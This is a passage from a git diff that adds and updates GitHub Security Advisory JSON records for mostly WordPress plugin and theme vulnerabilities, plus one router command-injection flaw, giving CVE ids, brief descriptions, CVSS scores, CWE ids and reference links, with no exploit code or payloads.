"Deserialization of Untrusted Data vulnerability in LoftOcean PatioTime patiotime allows Object Injection.This issue affects PatioTime: from n/a through < 2.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67995" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/patiotime/vulnerability/wordpress-patiotime-theme-2-1-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json b/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json new file mode 100644 index 0000000000000..0518e9393286a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jvrv-rj6m-mfm6/GHSA-jvrv-rj6m-mfm6.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jvrv-rj6m-mfm6", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69381" + ], + "details": "Missing Authorization vulnerability in vanquish WooCommerce Bulk Product Editor woocommerce-quick-product-editor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Bulk Product Editor: from n/a through <= 3.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69381" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-quick-product-editor/vulnerability/wordpress-woocommerce-bulk-product-editor-plugin-3-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json b/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json index 041bee78dee07..b0c8ea1803580 100644 --- a/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json +++ b/advisories/unreviewed/2026/02/GHSA-jw2g-7q64-j48j/GHSA-jw2g-7q64-j48j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jw2g-7q64-j48j", - "modified": "2026-02-19T21:30:48Z", + "modified": "2026-02-20T18:31:32Z", "published": "2026-02-19T21:30:48Z", "aliases": [ "CVE-2026-27440" ], "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saad Iqbal myCred mycred allows Stored XSS.This issue affects myCred: from n/a through <= 2.9.7.6.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T21:18:33Z" diff --git a/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json b/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json new file mode 100644 index 0000000000000..24e7485a57c70 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jw2x-9qxr-2w9w/GHSA-jw2x-9qxr-2w9w.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jw2x-9qxr-2w9w", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-2847" + ], + "details": "A vulnerability was detected in UTT HiPER 520 1.7.7-160105. Affected is the function sub_44EFB4 of the file /goform/formReleaseConnect of the component Web Management Interface. The manipulation of the argument Isp_Name results in os command injection. The attack can be launched remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2847" + }, + { + "type": "WEB", + "url": "https://github.com/cha0yang1/UTT520CVE/blob/main/UTTRCE2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347083" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347083" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753965" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json new file mode 100644 index 0000000000000..80b8de848cb63 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxq5-ggfq-q36w/GHSA-jxq5-ggfq-q36w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxq5-ggfq-q36w", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69386" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realvirtualmx RVCFDI para Woocommerce rvcfdi-para-woocommerce allows Reflected XSS.This issue affects RVCFDI para Woocommerce: from n/a through <= 8.1.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69386" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/rvcfdi-para-woocommerce/vulnerability/wordpress-rvcfdi-para-woocommerce-plugin-8-1-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json new file mode 100644 index 0000000000000..64d787ad2ebd5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m23x-mm6q-4qg4/GHSA-m23x-mm6q-4qg4.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m23x-mm6q-4qg4", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22364" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes SevenTrees seventrees allows PHP Local File Inclusion.This issue affects SevenTrees: from n/a through <=1.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22364" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/seventrees/vulnerability/wordpress-seventrees-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json b/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json new file mode 100644 index 0000000000000..09804306dc559 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m69x-7wp8-6gjv/GHSA-m69x-7wp8-6gjv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m69x-7wp8-6gjv", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69378" + ], + "details": "Incorrect Privilege Assignment vulnerability in XforWooCommerce Product Filter for WooCommerce prdctfltr allows Privilege Escalation.This issue affects Product Filter for WooCommerce: from n/a through <= 9.1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69378" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/prdctfltr/vulnerability/wordpress-product-filter-for-woocommerce-plugin-9-1-2-privilege-escalation-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json new file mode 100644 index 0000000000000..58423c0a7cd28 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m78j-wv7w-r94w/GHSA-m78j-wv7w-r94w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m78j-wv7w-r94w", + "modified": "2026-02-20T18:31:33Z", + "published": "2026-02-20T18:31:33Z", + "aliases": [ + "CVE-2025-53233" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RylanH Storyform storyform allows Reflected XSS.This issue affects Storyform: from n/a through <= 0.6.14.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53233" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/storyform/vulnerability/wordpress-storyform-plugin-0-6-14-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json b/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json new file mode 100644 index 0000000000000..68435d1d24d21 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mgwj-pxgv-5r8r/GHSA-mgwj-pxgv-5r8r.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgwj-pxgv-5r8r", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68024" + ], + "details": "Missing Authorization vulnerability in Addonify Addonify – WooCommerce Wishlist addonify-wishlist allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify – WooCommerce Wishlist: from n/a through <= 2.0.15.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68024" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/addonify-wishlist/vulnerability/wordpress-addonify-woocommerce-wishlist-plugin-2-0-15-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json b/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json new file mode 100644 index 0000000000000..e15e3642af807 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mhqr-8rx2-jw82/GHSA-mhqr-8rx2-jw82.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhqr-8rx2-jw82", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69365" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Uroan Core uroan-core allows Blind SQL Injection.This issue affects Uroan Core: from n/a through <= 1.4.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69365" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/uroan-core/vulnerability/wordpress-uroan-core-plugin-1-4-4-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json new file mode 100644 index 0000000000000..100d5087ba629 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mhvh-7hfw-2pcj/GHSA-mhvh-7hfw-2pcj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhvh-7hfw-2pcj", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67984" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in calliko NPS computy nps-computy allows DOM-Based XSS.This issue affects NPS computy: from n/a through <= 2.8.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67984" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/nps-computy/vulnerability/wordpress-nps-computy-plugin-2-8-2-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json b/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json new file mode 100644 index 0000000000000..ba317956155c5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mj24-8cx9-5wc8/GHSA-mj24-8cx9-5wc8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj24-8cx9-5wc8", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68032" + ], + "details": "Missing Authorization vulnerability in Passionate Brains Advanced WC Analytics advance-wc-analytics allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced WC Analytics: from n/a through <= 3.19.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68032" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/advance-wc-analytics/vulnerability/wordpress-advanced-wc-analytics-plugin-3-18-0-settings-change-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json b/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json new file mode 100644 index 0000000000000..7accc09f2f64b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mj7j-8qcf-454p/GHSA-mj7j-8qcf-454p.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj7j-8qcf-454p", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-68050" + ], + "details": "Missing Authorization vulnerability in Leadpages Leadpages leadpages allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Leadpages: from n/a through <= 1.1.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68050" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/leadpages/vulnerability/wordpress-leadpages-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json new file mode 100644 index 0000000000000..1616b0064619c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mj9g-3f37-7qv2/GHSA-mj9g-3f37-7qv2.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj9g-3f37-7qv2", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24950" + ], + "details": "Authorization Bypass Through User-Controlled Key vulnerability in themeplugs Authorsy authorsy allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Authorsy: from n/a through <= 1.0.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24950" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/authorsy/vulnerability/wordpress-authorsy-plugin-1-0-6-insecure-direct-object-references-idor-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json new file mode 100644 index 0000000000000..5bba14e15ed13 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mq7f-f783-pc94/GHSA-mq7f-f783-pc94.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mq7f-f783-pc94", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24949" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGoods PhotoMe photome allows DOM-Based XSS.This issue affects PhotoMe: from n/a through <= 5.7.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24949" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/photome/vulnerability/wordpress-photome-theme-5-7-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json new file mode 100644 index 0000000000000..d505c54d8ccaf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mqj4-m7cg-hx46/GHSA-mqj4-m7cg-hx46.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqj4-m7cg-hx46", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68501" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mollie Mollie Payments for WooCommerce mollie-payments-for-woocommerce allows Reflected XSS.This issue affects Mollie Payments for WooCommerce: from n/a through <= 8.1.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68501" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/mollie-payments-for-woocommerce/vulnerability/wordpress-mollie-payments-for-woocommerce-plugin-8-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json b/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json new file mode 100644 index 0000000000000..466e24c5dd517 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mrcv-7mr4-vfm5/GHSA-mrcv-7mr4-vfm5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mrcv-7mr4-vfm5", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69372" + ], + "details": "Deserialization of Untrusted Data vulnerability in AncoraThemes SevenHills sevenhills allows Object Injection.This issue affects SevenHills: from n/a through <= 1.6.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69372" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/sevenhills/vulnerability/wordpress-sevenhills-theme-1-6-2-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json b/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json new file mode 100644 index 0000000000000..648898578c67a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mrp6-8q86-qp29/GHSA-mrp6-8q86-qp29.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mrp6-8q86-qp29", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22361" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes A-Mart a-mart allows PHP Local File Inclusion.This issue affects A-Mart: from n/a through <= 1.0.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22361" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/a-mart/vulnerability/wordpress-a-mart-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json b/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json new file mode 100644 index 0000000000000..02faba3cf3c58 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mvfm-p427-8c26/GHSA-mvfm-p427-8c26.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvfm-p427-8c26", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69409" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes PJ | Life & Business Coaching pj allows PHP Local File Inclusion.This issue affects PJ | Life & Business Coaching: from n/a through <= 3.0.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69409" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/pj/vulnerability/wordpress-pj-life-business-coaching-theme-3-0-0-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json new file mode 100644 index 0000000000000..d9dbefe94ac9d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mvmh-gv2w-6hrm/GHSA-mvmh-gv2w-6hrm.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvmh-gv2w-6hrm", + "modified": "2026-02-20T18:31:36Z", + "published": "2026-02-20T18:31:36Z", + "aliases": [ + "CVE-2025-69323" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VeronaLabs Slimstat Analytics wp-slimstat allows Reflected XSS.This issue affects Slimstat Analytics: from n/a through <= 5.3.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69323" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-slimstat/vulnerability/wordpress-slimstat-analytics-plugin-5-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json new file mode 100644 index 0000000000000..e122c38294277 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mvp7-2m2r-2548/GHSA-mvp7-2m2r-2548.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mvp7-2m2r-2548", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-69296" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GhostPool Aardvark aardvark allows Reflected XSS.This issue affects Aardvark: from n/a through <= 4.6.3.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69296" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/aardvark/vulnerability/wordpress-aardvark-theme-4-6-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json b/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json new file mode 100644 index 0000000000000..930147cf664f1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mwrf-hg69-6h5g/GHSA-mwrf-hg69-6h5g.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mwrf-hg69-6h5g", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + 